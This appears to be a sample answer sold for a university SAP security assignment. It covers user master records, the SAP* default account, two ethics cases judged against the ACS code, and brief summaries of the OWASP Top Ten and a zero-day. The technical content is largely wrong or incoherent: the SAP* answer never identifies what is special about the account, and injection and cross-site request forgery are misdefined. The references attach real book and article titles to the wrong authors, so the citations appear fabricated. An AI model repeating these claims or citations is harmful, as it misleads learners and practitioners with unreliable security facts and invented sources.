Delivery in day(s): 4
CIS52005 SAP System Security Assignment
1.1How user master record in sap does plays an important role in ensuring assignments of appropriate rights, activity groups/ roles and authorizations for individual users?
User master record is the process of keeping all the information regarding the sensitive data of the user so as to keep all the records at one place to remove the confusion from the mindset of the user. User master record is a way of keeping the collaborated data so that the user can get the information easily at one place and can use that data whenever required and can use that information at the time of requirement of that particular data.
User master record plays a very important role in keeping the collaborated information at one place so as to maintain the confidentiality and sensitivity of that data so that the user can find the data at one place at the time of requirement of the data which should be used in fulfilling the particular task.(Hedberg & Winter, 2010)
In SAP user master records plays a very crucial role as it is important that all the records should be collaborated and if the all the records would be collaborated than it would be easy to secure that data so that it can be kept safe from the hackers. It is important to have the system security parameters so that the data can be kept secured and confidential.
It important to keep the user master record so as to maintain the relevancy of the data that the data is relevant to use and have all the appropriate rights that the data is authenticate and is relevant to use there is no conspiracy in using that particular data.(Mullins & Morton, 2011)
User master record insures that the data is authorized to be used by the singleuser and that user have all the rights reserved to use that data as it is accessible by the user and has all sort of security aspects that makes that data authenticate to be used by the single user.
User master record is also helpful for the group activity also as the group can collaborate all the important information at one place so that they can use that collaborated data as in the group activity they work on a same activity and perform several task so with the help of user master record they can collaborate separated data at one place and can fulfill the task and manage that task easily and in a secure way.(Nonaka & Earl, 2009)
User master record in SAP is a very important part as to keep the system secure it is important to have all the data of that system at one place as when that data would be collaborated then it would become easy to manage that particular data and it would become easy to fulfill all the security parameters so as to keep the data confidential and secured and to keep the data ready to use so that it could be used any time at the time requirement without any breach in the confidentiality of that particular data and so as to keep that data authenticate.
1.2.1 SAP R/3 creates a number of default accounts which deserves special attention. Describe what is special about the default user account sap*.
SAP R/3 manages four user accounts that are being protected by passwords. These accounts can only be accessed by the users who have the access to those accounts. SAP manages the accounts as it separates all the accounts by providing the Client number to the user and it separates the accounts by different components: username, passwords and client-number although the default passwords which are being provided to the clients are changed but those accounts are still secured and the information that is provided in those accounts remains confidential.
Specialty of Sap Default User Accounts
The specialty of default user account is that all the accounts that are being made have a unique client number which reduces the confusion that who has to use which account as it is necessary to fill the client number to have the access to that particular account.(Kaplan & Bytheway, 2001)
Secondly all the accounts are password protected as there are default passwords for every account as it is necessary for the access that the client should have a password provided to him/her so that the client could access into the account.
Thirdly all the accounts are secured as the accounts can only be accessed by the people who have the provided client number and who have access to the password of the accounts so it makes it secure to use the accounts which are being access by the users who have the same client number and it becomes secure to keep the confidential data in those accounts as the accounts are password protected and are secured.(Carr & Davenport, 2001)
1.2.2 As it is not possible to delete the sap* user accounts describe two suggested controls to secure this account from misuse.
As it is not possible to delete the SAP* user accounts and it becomes hard to manage the accounts as it contains the confidential data and it is very important that the data should be protected and should be kept in a secure way so that the data could not be hacked. And the ways via which the data can be secured are:
- Monitoring the account periodically: It is important to monitor the account periodically so as to keep the data secure and to have an access to the account so that no other person can use that account or we can say so that the account could not get hacked by any other person and the data could be kept confidential so as to keep that data authentic. As we cannot delete the SAP user account then it becomes necessary to keep an eye on the account periodically so as to maintain the authenticity of the account.(Scholl & Hammer, 2009)
- Vulnerability testing: It is important to keep a regular check on the vulnerabilities that what are the various vulnerabilities that can harm the data and it is important to keep the data secure as it is a confidential data and the user should use some firewalls so as to keep the vulnerabilities away from the account as the firewalls will help the user to keep all the vulnerabilities away and will help in keeping the data secure and confidential.
2.1.1 Key Ethical Concerns
Key ethical concerns were that the system will be storing a highly sensitive and confidential data which will contain the data regarding the performance evaluations and will contain medical records for filing insurance claim, salaries and so forth and as we can see the information is highly sensitive and should be kept then there should not be any loop in the security system as there would be any loop then the data can be hacked and the highly sensitive information that is regarding the customer can be leaked. Therefore it is important the that the security system should not be weak it should be strong but the problem that is occurring is that the system that is required is costly but it is efficient as with that system information can’t be hacked(Cyert & Morton, 2014).
In this scenario it is important that the CEO should not see that whether the system is costlier of it is cheaper it should think that how can the data can be kept secured as it contains the information regarding the health insurance claims of the customer and it’s an ethical issue if any information regarding the customer is being hacked then it’s the matter of concern as we can’t play with the information regarding the customer.
It’s the duty of the organization to keep the information secured anyhow as it contains really sensitive data and the everyone is dependent on that data whether it’s a customer or the employee the information regarding them should not be hacked by anyone and it’s a responsibility of the organization to keep that data secure and confidential and should have an effective security system so as to keep the sensitive data secured.
2.1.2 ACS codes of professional practice that would help in dealing with key ethical concerns
As the data is confidential and have the aspects related to the information regarding to the employee’s salary and it contains the information regarding the insurance policies of the customer so as keep that data secure it is important to have the honesty policy and that’s what Hellen feels she has given all the relevant thoughts that the system is costly but it will keep the data secure and confidential.
As it’s the matter customers the data of customers should be kept secured o as to maintain the confidentiality as it keeps the personal information of the customer so there should be competency and delegacy in the information so as to remove the breach in the information related to the customer. The information regarding the customer should not be hacked as it important for both for the customer as well as for the goodwill of the organization.(Walker & Wendt, 2007)
There should be a verge of professionalism as it is not important that the system that the people are buying is cheap or costly the thing matters is that how confidential and important the data is and how to manage that confidentiality so as to keep the information of the customer secure so that the information can’t be hacked by the hacker so there should be a professionalism in the work and people should not think that the software they are taking is costly or cheaper they should think about the information they are keeping with them and should think about the work they are doing and should take decision professionally.(Cyert & Morton, 2014)These were some of the ethical concerns that a person should keep in mind so as to keep the things stable and confidential as it’s the information regarding the customer is an ethical concern and the data should not be hacked by any one.
2.2.1 Key Ethical Concerns Raised by Fred’s Action
The key ethical concerns raised by Fred were that as he was given a highly sensitive task to perform he should keep in mind that he will have to keep the data confidential and secure as he was given all the access regarding the customer information so it’s a duty of Fred to keep that data with him it should not be like that he is discussing the matter with his family or friend he should maintain the confidentiality about the work given to him.
Fred should not leave the information unsecured as it have the information regarding the address of the customer so as to keep that data confidential Fred should keep his system password protected and should not leave his system here and there so as to secure the information regarding the customer. As if Fred leaves the system unlock then it could happen that anyone can transfer that data and can misuse it.(Walker & Wendt, 2007)
As Fred has burnt that data into the CD then he should keep that CD in a secure place as it keep all the information regarding the customer and if that CD would be theft by anyone then that person can misuse that information and it’s an ethical concern that, that data should be kept confidential as the information regarding the customer should not be hacked by anyone.
Therefore it’s a responsibility of Fred to keep that information solely with him he should not discuss it with anyone not even with the employees as if that data would be misused by anyone then the ultimate harm will get to the customer and customer should not get harmed with any of the activity of the employees or the organization.(Walker & Wendt, 2007)
2.2.2 ACS code of professional practices that would help in ethical concerns raised by Fred’s action
As all the access regarding the customer’s information were provided to Fred than it’s the responsibility that Fred should be honest in his work and should not breach out the information regarding the customer to anyone as it’s the matter of customer information which should remain confidential and is a matter of the reputation of the organization which is dependent solely on Fred.
As Fred was allow to complete the project from home so it is important for him that being at home also Fred should have an attitude of professionalism and should work on the verge that he is doing a very confidential work given by the organization and should have an attitude to keep the personal works and professional work separate and should not discuss about the official work with anyone. It’s the responsibility of Fred that he should keep the data secure and should give the priority to the office work and should complete that work on time without any breach in the information regarding the customer.(Hedberg & Winter, 2010)
By doing the responsible work which is given to Fred he will built a professional development if he will perform the task given to him with full dignity and with honesty and if he would maintain the confidentiality then would become a good example for his colleagues and for the organization as he would be maintaining all the decorum of the organization and will win the trust among the customers.(Kaplan & Bytheway, 2001)
It is important for every employee that he should be honest among his work and should have a professionalism whether he is working in the organization or doing the work from home and should develop his professional skills by keeping the work at his utmost priority.
3.1 Research the Top Ten Oswasp Vulnerabilities and One Zero Day Software Vulnerabilities
Top Ten Oswasp Vulnerabilities
- Injection: Injection flows if an untrusted data is sent to the interpreter then so as to keep that untrusted data away the process of injection flows.
- Broken authentication and session management: in this the authentication to the users identities are being broken in which the system compromises with the attackers to share the information regarding the keys, passwords and session tokens.
- Cross site scripting: cross site flows when an application takes untrusted data and sent it to the web browser without proper validation and escaping.
- Insecure direct object references: direct object references occur when a user exposed to an internal implementation object like file, dictionaries with checking the access to control those files.
- Security misconfiguration: a good security is required in the configuration of the system and when any loop is find security misconfiguration occurs.(Carl & White, 2006)
- Sensitive data exposure: many users do not keep the sensitive data secure because of which hackers hack their ids and steal the information which is confidential.
- Missing function level access control: there are many applications that verify the level action control and if those access controls are not properly checked then the hackers hacks the information from the system.(Kaplan & Bytheway, 2001)
- Cross site request forgery: in this the information is hacked by the hackers with the fault of the victim as the victim did not provide the proper information due to which the hackers hacks the information.
- Invalidated redirect and forward: web applications frequently redirect and forward the user to untrusted sites while working on some applications due to which breach in the operations causes and the information gets hacked.
- Using components with known vulnerabilities: in this the user knows that he is using the untrusted sites and the information gets hacked as they were working on the untrusted sites.
One Zero Day Software Vulnerability
This zero day software vulnerability allows the user to attack on the system software who visit to the internet explorer in this the hacker keep an eye on the untrusted sites and if the user visits those untrusted sites and if he has the access to other accounts also then the attacker uses some or the other coding so as to hack the other account of the user through internet explorer and hacks the authenticated account and gather all the confidential data which is of the need of the hacker and use that data in unauthenticated sources. Therefore the user should not visit on the unauthenticated sites if they are logged in to some other authenticated sites so as to keep the information secure with the with the hackers .(Carl & White, 2006)
The user should use the firewall so as to protect the data from the hackers so that they can visit any site and if they don’t know that which are the authenticated sites and which are not authenticated sites then the firewalls provide a popup regarding the vulnerabilities which will help the user to decide whether to visit that particular site or not.
In the end I would like to conclude that it is important for every organization to have a highly secured and configured system so as to protect the sensitive data and to maintain the confidentiality of the data it doesn’t matter whether the security system is costlier or cheaper every organization should use the security system which would help in securing the data from the hackers and it’s the responsibility of everyone in the organization to follow the business ethics so as to keep the data secure and confidential and it is important to have several firewalls to reduce the risk of vulnerabilities that could affect the information system of the organization.
- Carl, J., & White, B. (2006). IT vulnerabilities and its effects. Chicago: Pitman Publishing.
- Carr, N., & Davenport, M. (2001). Information technology and business process redesign. Operations management. critical perspectives on business and management , 19-28.
- Cyert, R., & Morton, M. (2014). Managing the ethical behaviours in the organization. Cambridge: Cambridge University Press.
- Hedberg, S., & Winter, B. (2010). The satisficing principle in capability learning. Strategic Management Journal , 122-132.
- Kaplan, R., & Bytheway, A. (2001). IT doesn’t matter. In Wringing real value from IT. HBR OnPoint , 99-105.
- Mullins, J., & Morton, I. (2011). "How organizations learn and unlearn". Chicago: Oxford University Press.
- Nonaka, I., & Earl, M. (2009). The corporation of the 1990s: Information technology and organizational transformation. London: Oxford University Press.
- Scholl, H., & Hammer, M. (2009). Information technology project management. Maxico: Pitman Publishing.
- Walker, S., & Wendt, M. (2007). Business Ethics. Duhram: Duke University Press.